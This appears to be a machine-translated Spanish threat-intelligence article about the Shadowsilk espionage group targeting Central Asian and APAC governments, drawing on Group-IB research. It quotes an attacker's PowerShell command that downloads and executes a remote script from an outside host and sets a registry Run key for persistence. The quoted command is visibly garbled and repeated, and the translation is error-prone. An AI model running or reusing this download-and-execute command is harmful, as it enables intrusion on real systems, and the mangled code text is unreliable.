Shadowsilk surgió por primera vez a fines de 2023 como un clúster de amenazas sofisticado dirigido a entidades gubernamentales en Asia Central y la región más amplia de APAC.
Explotando las vulnerabilidades públicas conocidas y los marcos de prueba de penetración ampliamente disponibles, el grupo orquesta campañas de exfiltración de datos con un alto grado de automatización y sigilo.
Las entregas iniciales se lograron a través de correos electrónicos de phishing que contienen archivos protegidos con contraseña; Tras la ejecución, estos dejaron caer una puerta trasera basada en telegrama que estableció un canal encubierto de comando y control.
La rápida proliferación de operaciones de Shadowsilk provocó un mayor escrutinio entre los equipos de seguridad regionales.
A principios de 2025, los analistas del Grupo IA identificaron una infraestructura renovada de Shadowsilk y una explosión de nuevos indicadores de compromiso, incluidos los bots de telegrama actualizados y las hazañas públicas reutilizadas como CVE-2024-27956 y CVE-2018-7602.
Los investigadores señalaron que el kit de herramientas del adversario combinó escáneres de código abierto como SQLMAP y FSCAN con scripts de bot de telegrama personalizados, creando una plataforma versátil capaz de reconocimiento, movimiento lateral y robo de datos a granel.
Este enfoque híbrido permitió a Shadowsilk alternarse sin problemas entre las herramientas disponibles libremente y el malware a medida, lo que complica los esfuerzos de detección y respuesta.
A mediados de 2025, el impacto del grupo era innegable: al menos 35 redes gubernamentales habían sufrido violaciones de datos, mientras que las capturas forenses de la imagen del servidor de Shadowsilk revelaron operadores multilingües y intrincadas suites de control de panel web.
Las víctimas observaron volcados de servidores de correo robados, credenciales administrativas e inteligencia crítica exfiltrada en archivos diarios de ZIP.
La sofisticación de estas campañas subraya la evolución deliberada de Shadowsilk de un pequeño actor basado en phishing en una amenaza persistente y de varias etapas capaz de mantener intrusiones prolongadas.
Una captura de pantalla de un correo electrónico de phishing de Shadowsilk (Fuente-Grupo-IB)
Investigadores del Grupo de IP anotado que los operadores de Shadowsilk mantienen dos subgrupos, uno principalmente de habla rusa y otros de habla china, trabajan en paralelo pero compartiendo activos virtuales.
El análisis de diseños de teclado, capturas de pantalla de escritorio e historias de comandos de telegrama confirmó este modelo operativo bilingüe. A pesar de las diferentes preferencias de herramientas, ambas facciones convergen en un objetivo consistente: cosechar información conflictiva y evadir los controles de seguridad tradicionales.
Mecanismo de infección y persistencia
La cadena de infección de Shadowsilk comienza con un correo electrónico con señuelo que entrega un archivo postal que se disfraza de un informe oficial o un boletín de proveedores.
Tras la extracción y ejecución de Rev.exe, la carga útil basada en PowerShell se conecta a una URL codificada como https://tpp.tj/bossmaster.txt, invocando:–
PowerShell -ExecutionPolicy Bypass -command “(invoke-WebRequest https://tpp.tj/Bossmaster.txt).content | iEx” Reg agrego Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ run /v Winuptask /T Reg_Sz /D ‘Powershell -ExecutionPolicy Bypasspass -Windows \ Windows \ CurrentSion \ run /v Winuptask /T Reg_Sz /D’ Powershell -ExecutionPolicy Bypasspass -\ Windows \ Windows \ run /v Winuptask /T Reg_Sz /D ‘Powershell -ExecutionPolicy Bypasspass -Oprimer https://tpp.tj/iap.txt).content |
Este fragmento no solo carga la puerta trasera principal, sino que también escribe una clave de registro en HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run para garantizar la persistencia después del reinicio.
El contenido del archivo /www/html/gramm.ps1 (fuente-Group-IB)
El script de la segunda etapa, /www/html/gramm.ps1, implementa un bucle de bot de telegrama que lee comandos entrantes a través de la API BOT, ejecuta instrucciones de shell arbitrarias y carga resultados o archivos directamente al chat de telegrama del atacante.
El mecanismo de persistencia aprovecha tanto las autorunas de registro como las tareas programadas. Shadowsilk implementa rutinariamente un descargador minimalista que obtiene módulos adicionales (cargas útiles de metasploit, balizas de ataque de cobalto o ejecuciones de ratas personalizadas) a través del mismo canal de telegrama.
Al entrelazar la infraestructura de mensajería social con devoluciones de llamada de malware convencionales, Shadowsilk evita las herramientas de seguridad de la red que normalmente marcan las conexiones desconocidas TCP o HTTPS, combinando el tráfico malicioso en interacciones BOT legítimas.
A través de esta infección de doble etapa y la puerta trasera persistente, Shadowsilk mantiene el acceso a largo plazo, habilitando la recopilación de datos, el vertido de credenciales y la exfiltración sistemática de los documentos archivados de los usuarios a los puntos finales controlados por los atacantes.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
